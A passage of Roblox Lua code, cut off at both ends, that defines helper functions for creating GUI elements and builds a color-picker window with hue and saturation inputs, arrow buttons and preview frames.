BorderSizePixel, ClipsDescendants, Name, Parent, Position, Size) local Frame = Instance.new("Frame") Frame.Active = Active Frame.BackgroundColor3 = BackgroundColor3 Frame.BackgroundTransparency = BackgroundTransparency Frame.BorderSizePixel = BorderSizePixel Frame.ClipsDescendants = ClipsDescendants Frame.Name = Name Frame.Parent = Parent Frame.Position = Position Frame.Size = Size return Frame end local function createTextLabel(BackgroundColor3, BackgroundTransparency, BorderSizePixel, Font, Name, Parent, Position, Size, Text, TextColor3, TextSize, TextWrapped, TextXAlignment, TextYAlignment, ZIndex) local TextLabel = Instance.new("TextLabel") TextLabel.BackgroundColor3 = BackgroundColor3 TextLabel.BackgroundTransparency = BackgroundTransparency TextLabel.BorderSizePixel = BorderSizePixel TextLabel.Font = Font TextLabel.Name = Name TextLabel.Parent = Parent TextLabel.Position = Position TextLabel.Size = Size TextLabel.Text = Text TextLabel.TextColor3 = TextColor3 TextLabel.TextSize = TextSize TextLabel.TextWrapped = TextWrapped TextLabel.TextXAlignment = TextXAlignment TextLabel.TextYAlignment = TextYAlignment TextLabel.ZIndex = ZIndex return TextLabel end local function createTextBox(BackgroundColor3, BackgroundTransparency, BorderSizePixel, Font, Name, Parent, PlaceholderText, Position, Size, Text, TextColor3, TextSize, TextWrapped, TextXAlignment, TextYAlignment) local TextBox = Instance.new("TextBox") TextBox.BackgroundColor3 = BackgroundColor3 TextBox.BackgroundTransparency = BackgroundTransparency TextBox.BorderSizePixel = BorderSizePixel TextBox.Font = Font TextBox.Name = Name TextBox.Parent = Parent TextBox.PlaceholderText = PlaceholderText TextBox.Position = Position TextBox.Size = Size TextBox.Text = Text TextBox.TextColor3 = TextColor3 TextBox.TextSize = TextSize TextBox.TextWrapped = TextWrapped TextBox.TextXAlignment = TextXAlignment TextBox.TextYAlignment = TextYAlignment return TextBox end local function createTextButton(BackgroundColor3, BackgroundTransparency, BorderSizePixel, Font, Name, Parent, Position, Size, Text, TextColor3, TextSize, ZIndex, func) local TextButton = Instance.new("TextButton") TextButton.BackgroundColor3 = BackgroundColor3 TextButton.BackgroundTransparency = BackgroundTransparency TextButton.BorderSizePixel = BorderSizePixel TextButton.Font = Font TextButton.Name = Name TextButton.Parent = Parent TextButton.Position = Position TextButton.Size = Size TextButton.Text = Text TextButton.TextColor3 = TextColor3 TextButton.TextSize = TextSize TextButton.ZIndex = ZIndex TextButton.MouseButton1Down:Connect(func) return TextButton end local function createImageLabel(BackgroundTransparency, Image, Name, Parent, Position, Selectable, Size, ZIndex) local ImageLabel = Instance.new("ImageLabel") ImageLabel.BackgroundTransparency = BackgroundTransparency ImageLabel.Image = Image ImageLabel.Name = Name ImageLabel.Parent = Parent ImageLabel.Position = Position ImageLabel.Selectable = Selectable ImageLabel.Size = Size ImageLabel.ZIndex = ZIndex return ImageLabel end local function createScrollingFrame(BackgroundColor3, BackgroundTransparency, BorderSizePixel, BottomImage, CanvasSize, MidImage, Name, Parent, Position, Rotation, ScrollBarThickness, Selectable, Size, TopImage, Visible) local ScrollingFrame = Instance.new("ScrollingFrame") ScrollingFrame.BackgroundColor3 = BackgroundColor3 ScrollingFrame.BackgroundTransparency = BackgroundTransparency ScrollingFrame.BorderSizePixel = BorderSizePixel ScrollingFrame.BottomImage = BottomImage ScrollingFrame.CanvasSize = CanvasSize ScrollingFrame.MidImage = MidImage ScrollingFrame.Name = Name ScrollingFrame.Parent = Parent ScrollingFrame.Position = Position ScrollingFrame.Rotation = Rotation ScrollingFrame.ScrollBarThickness = ScrollBarThickness ScrollingFrame.Selectable = Selectable ScrollingFrame.Size = Size ScrollingFrame.TopImage = TopImage ScrollingFrame.Visible = Visible return ScrollingFrame end function CreateInstance(cls,props) local inst = Instance.new(cls) for i,v in pairs(props) do inst[i] = v end return inst end local pickerCreated = false local ColorPicker do ColorPicker = {} local function createColorPick() local ColorPick = CreateInstance("ScreenGui",{DisplayOrder=0,Enabled=true,ResetOnSpawn=true,Name="ColorPick",}) local ColorPick2 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.39215689897537,0.39215689897537,0.39215689897537),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,450,0,330),SizeConstraint=0,Visible=true,ZIndex=1,Name="ColorPicker",Parent = ColorPick}) local ColorPickBack = CreateInstance("Frame",{Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=colorPickerBack,BackgroundTransparency=0,BorderColor3=Color3.new(0.14509804546833,0.20784315466881,0.21176472306252),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0, 0, 0, 0),Rotation=0,Selectable=false,Size=UDim2.new(1, 0, 1, 0),SizeConstraint=0,Visible=true,ZIndex=1,Name="Backdrop",Parent = ColorPick2}) local ColorPick3 = CreateInstance("Frame",{Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.fromRGB(117, 117, 117),BackgroundTransparency=0.5,BorderColor3=Color3.new(0.14509804546833,0.20784315466881,0.21176472306252),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,25),Rotation=0,Selectable=false,Size=UDim2.new(1,0,1,-25),SizeConstraint=0,Visible=true,ZIndex=1,Name="Content",Parent = ColorPickBack}) local ColorPick4 = CreateInstance("ImageLabel",{Image="rbxassetid://1072518502",ImageColor3=Color3.new(1,1,1),ImageRectOffset=Vector2.new(0,0),ImageRectSize=Vector2.new(0,0),ImageTransparency=0,ScaleType=0,SliceCenter=Rect.new(0,0,0,0),Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-30,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,13,0,200),SizeConstraint=0,Visible=true,ZIndex=1,Name="ColorStrip",Parent = ColorPick3}) local ColorPick5 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-260,0,211),Rotation=0,Selectable=false,Size=UDim2.new(0,35,1,-245),SizeConstraint=0,Visible=true,ZIndex=1,Name="Preview",Parent = ColorPick3}) local ColorPick6 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=true,Draggable=false,Position=UDim2.new(1,-261,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,222,0,202),SizeConstraint=0,Visible=true,ZIndex=1,Name="ColorSpaceFrame",Parent = ColorPick3}) local ColorPick7 = CreateInstance("ImageLabel",{Image="rbxassetid://1072518406",ImageColor3=Color3.new(1,1,1),ImageRectOffset=Vector2.new(0,0),ImageRectSize=Vector2.new(0,0),ImageTransparency=0,ScaleType=0,SliceCenter=Rect.new(0,0,0,0),Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,1,0,1),Rotation=0,Selectable=false,Size=UDim2.new(0,220,0,200),SizeConstraint=0,Visible=true,ZIndex=1,Name="ColorSpace",Parent = ColorPick6}) local ColorPick8 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,210,0,190),Rotation=0,Selectable=false,Size=UDim2.new(0,20,0,20),SizeConstraint=0,Visible=true,ZIndex=1,Name="Scope",Parent = ColorPick7}) local ColorPick9 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0,0,0),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,9,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,2,0,20),SizeConstraint=0,Visible=true,ZIndex=1,Name="Line",Parent = ColorPick8}) local ColorPick10 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0,0,0),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,9),Rotation=0,Selectable=false,Size=UDim2.new(0,20,0,2),SizeConstraint=0,Visible=true,ZIndex=1,Name="Line",Parent = ColorPick8}) local ColorPick11 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.3137255012989,0.3137255012989,0.3137255012989),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-16,0,1),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,208),SizeConstraint=0,Visible=true,ZIndex=1,Name="ArrowFrame",Parent = ColorPick3}) local ColorPick12 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,-2,0,-4),Rotation=0,Selectable=false,Size=UDim2.new(0,8,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick11}) local ColorPick13 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0,0,0),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,2,0,8),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick12}) local ColorPick14 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0,0,0),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,3,0,7),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,3),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick12}) local ColorPick15 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0,0,0),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,4,0,6),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,5),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick12}) local ColorPick16 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0,0,0),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,5,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,7),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick12}) local ColorPick17 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0,0,0),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,9),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick12}) local ColorPick18 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-180,0,211),Rotation=0,Selectable=false,Size=UDim2.new(0,52,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Hue",Parent = ColorPick3}) local ColorPick19 = CreateInstance("TextBox",{ClearTextOnFocus=true,Font=3,FontSize=5,MultiLine=false,Text="0",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=1,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,2,0,0),Rotation=0,Selectable=true,Size=UDim2.new(0,50,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Input",Parent = ColorPick18}) local ColorPick20 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-16,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="ArrowFrame",Parent = ColorPick19}) local ColorPick21 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Up",Parent = ColorPick20}) local ColorPick22 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick21}) local ColorPick23 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick22}) local ColorPick24 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick22}) local ColorPick25 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick22}) local ColorPick26 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,8),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Down",Parent = ColorPick20}) local ColorPick27 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick26}) local ColorPick28 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick27}) local ColorPick29 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick27}) local ColorPick30 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick27}) local ColorPick31 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Hue:",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=1,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,-40,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,34,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick18}) local ColorPick32 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=0,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-180,0,233),Rotation=0,Selectable=false,Size=UDim2.new(0,52,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Sat",Parent = ColorPick3}) local ColorPick33 = CreateInstance("TextBox",{ClearTextOnFocus=true,Font=3,FontSize=5,MultiLine=false,Text="0",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=0,TextYAlignment=1,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.25098040699959,0.25098040699959,0.25098040699959),BackgroundTransparency=1,BorderColor3=Color3.new(0.37647062540054,0.37647062540054,0.37647062540054),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,2,0,0),Rotation=0,Selectable=true,Size=UDim2.new(0,50,0,16),SizeConstraint=0,Visible=true,ZIndex=1,Name="Input",Parent = ColorPick32}) local ColorPick34 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(1,-16,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="ArrowFrame",Parent = ColorPick33}) local ColorPick35 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Up",Parent = ColorPick34}) local ColorPick36 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick35}) local ColorPick37 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick36}) local ColorPick38 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick36}) local ColorPick39 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick36}) local ColorPick40 = CreateInstance("TextButton",{Font=3,FontSize=5,Text="",TextColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=2,TextYAlignment=1,AutoButtonColor=false,Modal=false,Selected=false,Style=0,Active=true,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,8),Rotation=0,Selectable=true,Size=UDim2.new(1,0,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Down",Parent = ColorPick34}) local ColorPick41 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.63921570777893,0.63529413938522,0.64705884456635),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,0,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,16,0,8),SizeConstraint=0,Visible=true,ZIndex=1,Name="Arrow",Parent = ColorPick40}) local ColorPick42 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,8,0,5),Rotation=0,Selectable=false,Size=UDim2.new(0,1,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick41}) local ColorPick43 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,7,0,4),Rotation=0,Selectable=false,Size=UDim2.new(0,3,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick41}) local ColorPick44 = CreateInstance("Frame",{Style=0,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(0.86274510622025,0.86274510622025,0.86274510622025),BackgroundTransparency=0,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=0,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,6,0,3),Rotation=0,Selectable=false,Size=UDim2.new(0,5,0,1),SizeConstraint=0,Visible=true,ZIndex=1,Name="Frame",Parent = ColorPick41}) local ColorPick45 = CreateInstance("TextLabel",{Font=3,FontSize=5,Text="Sat:",TextColor3=Color3.new(0.86274516582489,0.86274516582489,0.86274516582489),TextScaled=false,TextSize=14,TextStrokeColor3=Color3.new(0,0,0),TextStrokeTransparency=1,TextTransparency=0,TextWrapped=false,TextXAlignment=1,TextYAlignment=1,Active=false,AnchorPoint=Vector2.new(0,0),BackgroundColor3=Color3.new(1,1,1),BackgroundTransparency=1,BorderColor3=Color3.new(0.10588236153126,0.16470588743687,0.20784315466881),BorderSizePixel=1,ClipsDescendants=false,Draggable=false,Position=UDim2.new(0,-40,0,0),Rotation=0,Selectable=false,Size=UDim2.new(0,34,1,0),SizeConstraint=0,Visible=true,ZIndex=1,Name="Title",Parent = ColorPick32}) local ColorPick46 = 